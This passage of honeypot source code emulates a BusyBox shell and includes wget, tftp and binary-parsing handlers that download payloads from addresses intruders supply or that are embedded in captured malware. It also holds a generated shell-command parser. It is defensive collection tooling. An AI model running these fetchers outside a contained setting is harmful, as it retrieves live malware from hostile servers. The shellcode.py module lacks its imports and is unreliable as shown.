Currently defined functions: """ + " ".join(Proc.procs.keys()) + "\n\n") return 0 name = args[0] args = args[1:] if Proc.get(name): return Proc.get(name).run(env, args) else: env.write(name + ": applet not found\n") return 1 class Cat(Proc): def run(self, env, args): fname = args[0] string = env.readFile(fname) if string != None: env.write(string) return 0 else: env.write("cat: " + fname + ": No such file or directory\n") return 1 class Echo(Proc): def run(self, env, args): opts = "" if args[0][0] == "-": opts = args[0][1:] args = args[1:] string = " ".join(args) if "e" in opts: string = string.decode('string_escape') env.write(string) if not("n" in opts): env.write("\n") return 0 class Rm(Proc): def run(self, env, args): if args[0] in env.listfiles(): env.deleteFile(args[0]) return 0 else: env.write("rm: cannot remove '" + args[0] + "': No such file or directory\n") return 1 class Ls(Proc): def run(self, env, args): for f in env.listfiles().keys(): env.write(f + "\n") return 0 class Dd(Proc): def run(self, env, args): infile = None outfile = None count = None bs = 512 for a in args: if a.startswith("if="): infile = a[3:] if a.startswith("of="): outfile = a[3:] if a.startswith("count="): count = int(a[6:]) if a.startswith("bs="): bs = int(a[3:]) if infile != None: data = env.readFile(infile) if count != None: data = data[0:(count*bs)] if outfile: env.deleteFile(infile) env.writeFile(infile, data) else: env.write(data) env.write("""0+0 records in 0+0 records out 0 bytes copied, 0 s, 0,0 kB/s\n""") return 0 class Cp(Proc): def run(self, env, args): infile = args[0] outfile = args[1] data = env.readFile(infile) if data != None: env.writeFile(outfile, data) return 0 else: env.write("cp: cannot stat '" + infile + "': No such file or directory\n") return 1 Proc.register("cp", Cp()) Proc.register("ls", Ls()) Proc.register("cat", Cat()) Proc.register("dd", Dd()) Proc.register("rm", Rm()) Proc.register("echo", Echo()) Proc.register("busybox", BusyBox()) 
Proc.register("exec", Exec()) Proc.register("cd", StaticProc("")) Proc.register("true", StaticProc("")) Proc.register("chmod", StaticProc("")) Proc.register("uname", StaticProc("")) Proc.register(":", StaticProc("")) Proc.register("ps", StaticProc( """ PID TTY TIME CMD 6467 pts/0 00:00:00 sh 12013 pts/0 00:00:00 ps\n""")) # Other files from wget import Wget from shell import Shell # tftp disabled #from tftp import Tftp ================================================ FILE: honeypot/shell/commands/binary.py ================================================ import socket import struct import select def dbg(s): print s def run_binary(data, fname, args, env): dbg("Parsing binary file " + fname + " (" + str(len(data)) + " bytes)") socks = [] tuples = [] pos = 0 while True: pos = data.find("\x02\x00", pos) if pos == -1: break sockaddr = data[pos:pos+8] sockaddr = struct.unpack(">HHBBBB", sockaddr) pos += 8 # Ignore ip addresses starting with 0 or > 224 (multicast) if (sockaddr[2] == 0 or sockaddr[2] >= 224): continue ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." 
+ str(sockaddr[5]) port = sockaddr[1] tuples.append((ip, port)) for addr in tuples: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(15) s.setblocking(0) s.connect_ex(addr) socks.append(s) dbg("Trying tcp://" + addr[0] + ":" + str(addr[1])) except: pass goodsocket = None data = None url = None while len(socks) > 0: read, a, b = select.select(socks, [], [], 15) if len(read) == 0: break for s in read: if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0: try: s.setblocking(1) data = s.recv(1024) goodsocket = s peer = s.getpeername() url = "tcp://" + peer[0] + ":" + str(peer[1]) dbg("Connected to " + url) break except: s.close() socks.remove(s) else: s.close() socks.remove(s) if goodsocket != None: break for s in socks: if s != goodsocket: s.close() if goodsocket == None: dbg("Could not connect.\n") #for addr in tuples: # env.write(tuples[0] + ":" + tuples[1] + "\n") return 1 while True: r = goodsocket.recv(1024) if r != "": data += r else: break goodsocket.close() # Normally these stub downloaders will output to stdout env.write(data) env.action("download", { "url": url, "path": "(stdout)", "info": "", "data": data }) return 0 ================================================ FILE: honeypot/shell/commands/cmd_util.py ================================================ from getopt import gnu_getopt, GetoptError def easy_getopt(args, opt, longopts=[]): optlist, args = gnu_getopt(args, opt, longopts) optdict = {} for item in optlist: optdict[item[0]] = item[1] return optdict, args ================================================ FILE: honeypot/shell/commands/shell.py ================================================ from base import Proc class Shell(Proc): def run(self, env, args): from honeypot.shell.shell import run if len(args) == 0: env.write("Busybox built-in shell (ash)\n") return 0 fname = args[0] contents = env.readFile(fname) if contents == None: env.write("sh: 0: Can't open " + fname) return 1 else: shell = Proc.get("exec") for line in 
contents.split("\n"): line = line.strip() line = line.split("#")[0] run(line, env) return 0 Proc.register("sh", Shell()) ================================================ FILE: honeypot/shell/commands/shellcode.py ================================================ from base import Proc class Shellcode(): def run(self, data): dbg("Parsing stub downloader (" + str(len(data)) + " bytes)") socks = [] tuples = [] pos = 0 while True: pos = data.find("\x02\x00", pos) if pos == -1: break sockaddr = data[pos:pos+8] sockaddr = struct.unpack(">HHBBBB", sockaddr) ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." + str(sockaddr[5]) port = sockaddr[1] tuples.append((ip, port)) pos += 8 for addr in tuples: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(15) s.setblocking(0) s.connect_ex(addr) socks.append(s) dbg("Trying tcp://" + addr[0] + ":" + str(addr[1])) except: pass goodsocket = None data = None url = None while len(socks) > 0: read, a, b = select.select(socks, [], [], 15) if len(read) == 0: break for s in read: if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0: try: s.setblocking(1) data = s.recv(1024) goodsocket = s peer = s.getpeername() url = "tcp://" + peer[0] + ":" + str(peer[1]) dbg("Connected to " + url) break except: s.close() socks.remove(s) else: s.close() socks.remove(s) if goodsocket != None: break for s in socks: if s != goodsocket: s.close() if goodsocket == None: dbg("Could not connect to any addresses in binary.") return while True: r = goodsocket.recv(1024) if r != "": data += r else: break goodsocket.close() self.record.add_file(data, url=url) ================================================ FILE: honeypot/shell/commands/tftp.py ================================================ #!/usr/bin/env python import io import traceback from getopt import gnu_getopt, GetoptError from tftpy import TftpClient from cmd_util import easy_getopt from base import Proc from util.config import config class 
DummyIO(io.RawIOBase): def __init__(self): self.data = "" def write(self, s): self.data += s class StaticTftp(Proc): def run(self, env, args): Tftp().run(env, args) class Tftp: help = """BusyBox v1.22.1 (Ubuntu 1:1.22.0-15ubuntu1) multi-call binary. Usage: tftp [OPTIONS] HOST [PORT] Transfer a file from/to tftp server -l FILE Local FILE -r FILE Remote FILE -g Get file -p Put file -b SIZE Transfer blocks of SIZE octets """ def run(self, env, args): self.env = env self.connected = False self.chunks = 0 try: opts, args = easy_getopt(args, "l:r:gpb:") except GetoptError as e: env.write("tftp: " + str(e) + "\n") env.write(Tftp.help) return if len(args) == 0: env.write(Tftp.help) return elif len(args) == 1: host = args[0] port = 69 if ":" in host: parts = host.split(":") host = parts[0] port = int(parts[1]) else: host = args[0] port = int(args[1]) if "-p" in opts: env.write("tftp: option 'p' not implemented\n") return if "-b" in opts: env.write("tftp: option 'b' not implemented\n") return if "-r" in opts: path = opts["-r"] else: print Tftp.help return if "-l" in opts: fname = opts["-l"] else: fname = path try: data = self.download(host, port, path) env.writeFile(fname, data) env.action("download", { "url": "tftp://" + host + ":" + str(port) + "/" + path, "path": fname, "info": None, "data": data }) self.env.write("\nFinished. Saved to " + fname + ".\n") except: env.write("tftp: timeout\n") env.action("download", { "url": "tftp://" + host + ":" + str(port) + "/" + path, "path": fname, "info": None, "data": None }) def download(self, host, port, fname): if config.get("fake_dl", optional=True, default=False): return str(hash(host + str(port) + fname)) output = DummyIO() client = TftpClient(host, port) self.env.write("Trying " + host + ":" + str(port) + " ... 
") client.download(fname, output, timeout=5, packethook=self.pkt) return output.data def pkt(self, data): if not(self.connected): self.env.write("OK\n") self.connected = True #if self.chunks % 60 == 0: # self.env.write("\n") self.chunks += 1 #self.env.write(".") Proc.register("tftp", StaticTftp()) ================================================ FILE: honeypot/shell/commands/wget.py ================================================ import requests import traceback import datetime import urlparse from util.config import config from base import Proc class Wget(Proc): def dl(self, env, url, path=None, echo=True): u = urlparse.urlparse(url) host = u.hostname ip = "127.0.0.1" port = u.port if u.port else 80 date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") if echo: env.write("--"+date+"-- " + url + "\n") env.write("Resolving " + host + " (" + host + ")... " + ip + "\n") env.write("Connecting to " + host + " (" + host + ")|" + ip + "|:" + str(port) + "...") if path == None: path = url.split("/")[-1].strip() if path == "": path = "index.html" if config.get("fake_dl", optional=True, default=False): data = str(hash(url)) info = "" else: hdr = { "User-Agent" : "Wget/1.15 (linux-gnu)" } r = None try: r = requests.get(url, stream=True, timeout=5.0, headers=hdr) if echo: env.write(" connected\n") env.write("HTTP request sent, awaiting response... 200 OK\n") env.write("Length: unspecified [text/html]\n") env.write("Saving to: '"+path+"'\n\n") env.write(" 0K .......... 
7,18M=0,001s\n\n") env.write(date+" (7,18 MB/s) - '"+path+"' saved [11213]\n") data = "" for chunk in r.iter_content(chunk_size = 4096): data = data + chunk info = "" for his in r.history: info = info + "HTTP " + str(his.status_code) + "\n" for k,v in his.headers.iteritems(): info = info + k + ": " + v + "\n" info = info + "\n" info = info + "HTTP " + str(r.status_code) + "\n" for k,v in r.headers.iteritems(): info = info + k + ": " + v + "\n" except requests.ConnectTimeout as e: data = None info = "Download failed" if echo: env.write(" failed: Connection timed out.\n") env.write("Giving up.\n\n") except requests.ConnectionError as e: data = None info = "Download failed" if echo: env.write(" failed: Connection refused.\n") env.write("Giving up.\n\n") except requests.ReadTimeout as e: data = None info = "Download failed" if echo: env.write(" failed: Read timeout.\n") env.write("Giving up.\n\n") except Exception as e: data = None info = "Download failed" if echo: env.write(" failed: " + str(e.message) + ".\n") env.write("Giving up.\n\n") if data: env.writeFile(path, data) env.action("download", { "url": url, "path": path, "info": info, "data": data }) def run(self, env, args): if len(args) == 0: env.write("""BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [-U|--user-agent AGENT] URL... Retrieve files via HTTP or FTP -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) 
-O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') """) return 1 else: echo = True for arg in args: if arg == "-O": echo = False for url in args: if url.startswith("http"): self.dl(env, url, echo=echo) return 0 Proc.register("wget", Wget()) ================================================ FILE: honeypot/shell/grammar.peg ================================================ grammar cmd cmd <- cmdlist / empty cmdlist <- cmdsingle (sep (";" / "&") sep cmdlist)? %make_list cmdsingle <- cmdpipe (sep ("||" / "&&") sep cmdsingle)? %make_single cmdpipe <- cmdredir (sep ("|" !"|") sep cmdpipe)? %make_pipe cmdredir <- cmdargs ( sep (">>-" / ">>" / "<<" / "<>" / "<&" / ">&" / "<" / ">") sep arg )* %make_redir cmdargs <- cmdbrac / args cmdbrac <- "(" sep cmd sep ")" %make_cmdbrac args <- arg (" "+ arg)* %make_args arg <- arg_quot1 / arg_quot2 / arg_noquot / empty arg_noempty <- arg_quot1 / arg_quot2 / arg_noquot arg_quot1 <- "'" [^']* "'" %make_arg_quot arg_quot2 <- '"' [^"]* '"' %make_arg_quot arg_noquot <- [^ ;|&()"'><]+ %make_arg_noquot empty <- ""? 
sep <- " "* ================================================ FILE: honeypot/shell/grammar.py ================================================ from collections import defaultdict import re class TreeNode(object): def __init__(self, text, offset, elements=None): self.text = text self.offset = offset self.elements = elements or [] def __iter__(self): for el in self.elements: yield el class TreeNode1(TreeNode): def __init__(self, text, offset, elements): super(TreeNode1, self).__init__(text, offset, elements) self.cmdsingle = elements[0] class TreeNode2(TreeNode): def __init__(self, text, offset, elements): super(TreeNode2, self).__init__(text, offset, elements) self.sep = elements[2] self.cmdlist = elements[3] class TreeNode3(TreeNode): def __init__(self, text, offset, elements): super(TreeNode3, self).__init__(text, offset, elements) self.cmdpipe = elements[0] class TreeNode4(TreeNode): def __init__(self, text, offset, elements): super(TreeNode4, self).__init__(text, offset, elements) self.sep = elements[2] self.cmdsingle = elements[3] class TreeNode5(TreeNode): def __init__(self, text, offset, elements): super(TreeNode5, self).__init__(text, offset, elements) self.cmdredir = elements[0] class TreeNode6(TreeNode): def __init__(self, text, offset, elements): super(TreeNode6, self).__init__(text, offset, elements) self.sep = elements[2] self.cmdpipe = elements[3] class TreeNode7(TreeNode): def __init__(self, text, offset, elements): super(TreeNode7, self).__init__(text, offset, elements) self.cmdargs = elements[0] class TreeNode8(TreeNode): def __init__(self, text, offset, elements): super(TreeNode8, self).__init__(text, offset, elements) self.sep = elements[2] self.arg = elements[3] class TreeNode9(TreeNode): def __init__(self, text, offset, elements): super(TreeNode9, self).__init__(text, offset, elements) self.sep = elements[3] self.cmd = elements[2] class TreeNode10(TreeNode): def __init__(self, text, offset, elements): super(TreeNode10, self).__init__(text, 
offset, elements) self.arg = elements[0] class TreeNode11(TreeNode): def __init__(self, text, offset, elements): super(TreeNode11, self).__init__(text, offset, elements) self.arg = elements[1] class ParseError(SyntaxError): pass FAILURE = object() class Grammar(object): REGEX_1 = re.compile('^[^\']') REGEX_2 = re.compile('^[^"]') REGEX_3 = re.compile('^[^ ;|&()"\'><]') def _read_cmd(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmd'].get(index0) if cached: self._offset = cached[1] return cached[0] index1 = self._offset address0 = self._read_cmdlist() if address0 is FAILURE: self._offset = index1 address0 = self._read_empty() if address0 is FAILURE: self._offset = index1 self._cache['cmd'][index0] = (address0, self._offset) return address0 def _read_cmdlist(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdlist'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 = self._read_cmdsingle() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE index2 = self._offset index3, elements1 = self._offset, [] address3 = FAILURE address3 = self._read_sep() if address3 is not FAILURE: elements1.append(address3) address4 = FAILURE index4 = self._offset chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == ';': address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('";"') if address4 is FAILURE: self._offset = index4 chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 == '&': address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address4 = 
FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"&"') if address4 is FAILURE: self._offset = index4 if address4 is not FAILURE: elements1.append(address4) address5 = FAILURE address5 = self._read_sep() if address5 is not FAILURE: elements1.append(address5) address6 = FAILURE address6 = self._read_cmdlist() if address6 is not FAILURE: elements1.append(address6) else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 if elements1 is None: address2 = FAILURE else: address2 = TreeNode2(self._input[index3:self._offset], index3, elements1) self._offset = self._offset if address2 is FAILURE: address2 = TreeNode(self._input[index2:index2], index2) self._offset = index2 if address2 is not FAILURE: elements0.append(address2) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_list(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdlist'][index0] = (address0, self._offset) return address0 def _read_cmdsingle(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdsingle'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 = self._read_cmdpipe() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE index2 = self._offset index3, elements1 = self._offset, [] address3 = FAILURE address3 = self._read_sep() if address3 is not FAILURE: elements1.append(address3) address4 = FAILURE index4 = self._offset chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 2] if chunk0 == '||': address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) 
self._offset = self._offset + 2 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"||"') if address4 is FAILURE: self._offset = index4 chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 2] if chunk1 == '&&': address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"&&"') if address4 is FAILURE: self._offset = index4 if address4 is not FAILURE: elements1.append(address4) address5 = FAILURE address5 = self._read_sep() if address5 is not FAILURE: elements1.append(address5) address6 = FAILURE address6 = self._read_cmdsingle() if address6 is not FAILURE: elements1.append(address6) else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 if elements1 is None: address2 = FAILURE else: address2 = TreeNode4(self._input[index3:self._offset], index3, elements1) self._offset = self._offset if address2 is FAILURE: address2 = TreeNode(self._input[index2:index2], index2) self._offset = index2 if address2 is not FAILURE: elements0.append(address2) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_single(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdsingle'][index0] = (address0, self._offset) return address0 def _read_cmdpipe(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdpipe'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 
= self._read_cmdredir() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE index2 = self._offset index3, elements1 = self._offset, [] address3 = FAILURE address3 = self._read_sep() if address3 is not FAILURE: elements1.append(address3) address4 = FAILURE index4, elements2 = self._offset, [] address5 = FAILURE chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == '|': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"|"') if address5 is not FAILURE: elements2.append(address5) address6 = FAILURE index5 = self._offset chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 == '|': address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address6 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"|"') self._offset = index5 if address6 is FAILURE: address6 = TreeNode(self._input[self._offset:self._offset], self._offset) self._offset = self._offset else: address6 = FAILURE if address6 is not FAILURE: elements2.append(address6) else: elements2 = None self._offset = index4 else: elements2 = None self._offset = index4 if elements2 is None: address4 = FAILURE else: address4 = TreeNode(self._input[index4:self._offset], index4, elements2) self._offset = self._offset if address4 is not FAILURE: elements1.append(address4) address7 = FAILURE address7 = self._read_sep() if address7 is not FAILURE: elements1.append(address7) address8 = FAILURE address8 = self._read_cmdpipe() if address8 is not FAILURE: elements1.append(address8) else: elements1 = None self._offset = 
index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 if elements1 is None: address2 = FAILURE else: address2 = TreeNode6(self._input[index3:self._offset], index3, elements1) self._offset = self._offset if address2 is FAILURE: address2 = TreeNode(self._input[index2:index2], index2) self._offset = index2 if address2 is not FAILURE: elements0.append(address2) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_pipe(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdpipe'][index0] = (address0, self._offset) return address0 def _read_cmdredir(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdredir'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 = self._read_cmdargs() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE remaining0, index2, elements1, address3 = 0, self._offset, [], True while address3 is not FAILURE: index3, elements2 = self._offset, [] address4 = FAILURE address4 = self._read_sep() if address4 is not FAILURE: elements2.append(address4) address5 = FAILURE index4 = self._offset chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 3] if chunk0 == '>>-': address5 = TreeNode(self._input[self._offset:self._offset + 3], self._offset) self._offset = self._offset + 3 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('">>-"') if address5 is FAILURE: self._offset = index4 chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 2] if chunk1 == '>>': address5 = 
TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('">>"') if address5 is FAILURE: self._offset = index4 chunk2 = None if self._offset < self._input_size: chunk2 = self._input[self._offset:self._offset + 2] if chunk2 == '<<': address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"<<"') if address5 is FAILURE: self._offset = index4 chunk3 = None if self._offset < self._input_size: chunk3 = self._input[self._offset:self._offset + 2] if chunk3 == '<>': address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"<>"') if address5 is FAILURE: self._offset = index4 chunk4 = None if self._offset < self._input_size: chunk4 = self._input[self._offset:self._offset + 2] if chunk4 == '<&': address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"<&"') if address5 is FAILURE: self._offset = index4 chunk5 = None if self._offset < self._input_size: chunk5 = self._input[self._offset:self._offset + 2] if chunk5 == '>&': address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] 
if self._offset == self._failure: self._expected.append('">&"') if address5 is FAILURE: self._offset = index4 chunk6 = None if self._offset < self._input_size: chunk6 = self._input[self._offset:self._offset + 1] if chunk6 == '<': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"<"') if address5 is FAILURE: self._offset = index4 chunk7 = None if self._offset < self._input_size: chunk7 = self._input[self._offset:self._offset + 1] if chunk7 == '>': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('">"') if address5 is FAILURE: self._offset = index4 if address5 is not FAILURE: elements2.append(address5) address6 = FAILURE address6 = self._read_sep() if address6 is not FAILURE: elements2.append(address6) address7 = FAILURE address7 = self._read_arg() if address7 is not FAILURE: elements2.append(address7) else: elements2 = None self._offset = index3 else: elements2 = None self._offset = index3 else: elements2 = None self._offset = index3 else: elements2 = None self._offset = index3 if elements2 is None: address3 = FAILURE else: address3 = TreeNode8(self._input[index3:self._offset], index3, elements2) self._offset = self._offset if address3 is not FAILURE: elements1.append(address3) remaining0 -= 1 if remaining0 <= 0: address2 = TreeNode(self._input[index2:self._offset], index2, elements1) self._offset = self._offset else: address2 = FAILURE if address2 is not FAILURE: elements0.append(address2) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: 
address0 = self._actions.make_redir(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdredir'][index0] = (address0, self._offset) return address0 def _read_cmdargs(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdargs'].get(index0) if cached: self._offset = cached[1] return cached[0] index1 = self._offset address0 = self._read_cmdbrac() if address0 is FAILURE: self._offset = index1 address0 = self._read_args() if address0 is FAILURE: self._offset = index1 self._cache['cmdargs'][index0] = (address0, self._offset) return address0 def _read_cmdbrac(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdbrac'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == '(': address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address1 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"("') if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE address2 = self._read_sep() if address2 is not FAILURE: elements0.append(address2) address3 = FAILURE address3 = self._read_cmd() if address3 is not FAILURE: elements0.append(address3) address4 = FAILURE address4 = self._read_sep() if address4 is not FAILURE: elements0.append(address4) address5 = FAILURE chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 == ')': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('")"') if 
address5 is not FAILURE: elements0.append(address5) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_cmdbrac(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdbrac'][index0] = (address0, self._offset) return address0 def _read_args(self): address0, index0 = FAILURE, self._offset cached = self._cache['args'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 = self._read_arg() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE remaining0, index2, elements1, address3 = 0, self._offset, [], True while address3 is not FAILURE: index3, elements2 = self._offset, [] address4 = FAILURE remaining1, index4, elements3, address5 = 1, self._offset, [], True while address5 is not FAILURE: chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == ' ': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('" "') if address5 is not FAILURE: elements3.append(address5) remaining1 -= 1 if remaining1 <= 0: address4 = TreeNode(self._input[index4:self._offset], index4, elements3) self._offset = self._offset else: address4 = FAILURE if address4 is not FAILURE: elements2.append(address4) address6 = FAILURE address6 = self._read_arg() if address6 is not FAILURE: elements2.append(address6) else: elements2 = None self._offset = index3 else: elements2 = None self._offset = index3 if elements2 is None: address3 = FAILURE else: address3 
= TreeNode11(self._input[index3:self._offset], index3, elements2)
                    self._offset = self._offset
                if address3 is not FAILURE:
                    elements1.append(address3)
                    remaining0 -= 1
            # Zero-or-more repetition of (" "+ arg) succeeded overall iff the
            # required count (0) was consumed.
            if remaining0 <= 0:
                address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
                self._offset = self._offset
            else:
                address2 = FAILURE
            if address2 is not FAILURE:
                elements0.append(address2)
            else:
                elements0 = None
                self._offset = index1
        else:
            elements0 = None
            self._offset = index1
        if elements0 is None:
            address0 = FAILURE
        else:
            # Hand the matched pieces to the semantic action (builds Command).
            address0 = self._actions.make_args(self._input, index1, self._offset, elements0)
            self._offset = self._offset
        self._cache['args'][index0] = (address0, self._offset)
        return address0

    def _read_arg(self):
        # arg <- arg_quot1 / arg_quot2 / arg_noquot / empty
        # Ordered choice: single-quoted, double-quoted, bare word, or nothing.
        address0, index0 = FAILURE, self._offset
        cached = self._cache['arg'].get(index0)
        if cached:
            self._offset = cached[1]
            return cached[0]
        index1 = self._offset
        address0 = self._read_arg_quot1()
        if address0 is FAILURE:
            self._offset = index1
            address0 = self._read_arg_quot2()
            if address0 is FAILURE:
                self._offset = index1
                address0 = self._read_arg_noquot()
                if address0 is FAILURE:
                    self._offset = index1
                    address0 = self._read_empty()
                    if address0 is FAILURE:
                        self._offset = index1
        self._cache['arg'][index0] = (address0, self._offset)
        return address0

    def _read_arg_noempty(self):
        # arg_noempty <- arg_quot1 / arg_quot2 / arg_noquot
        # Same as arg but the empty match is not allowed.
        address0, index0 = FAILURE, self._offset
        cached = self._cache['arg_noempty'].get(index0)
        if cached:
            self._offset = cached[1]
            return cached[0]
        index1 = self._offset
        address0 = self._read_arg_quot1()
        if address0 is FAILURE:
            self._offset = index1
            address0 = self._read_arg_quot2()
            if address0 is FAILURE:
                self._offset = index1
                address0 = self._read_arg_noquot()
                if address0 is FAILURE:
                    self._offset = index1
        self._cache['arg_noempty'][index0] = (address0, self._offset)
        return address0

    def _read_arg_quot1(self):
        # arg_quot1 <- "'" [^']* "'"  (single-quoted argument).
        address0, index0 = FAILURE, self._offset
        cached = self._cache['arg_quot1'].get(index0)
        if cached:
            self._offset = cached[1]
            return cached[0]
        index1, elements0 = self._offset, []
        address1 = FAILURE
        chunk0 = None
        if
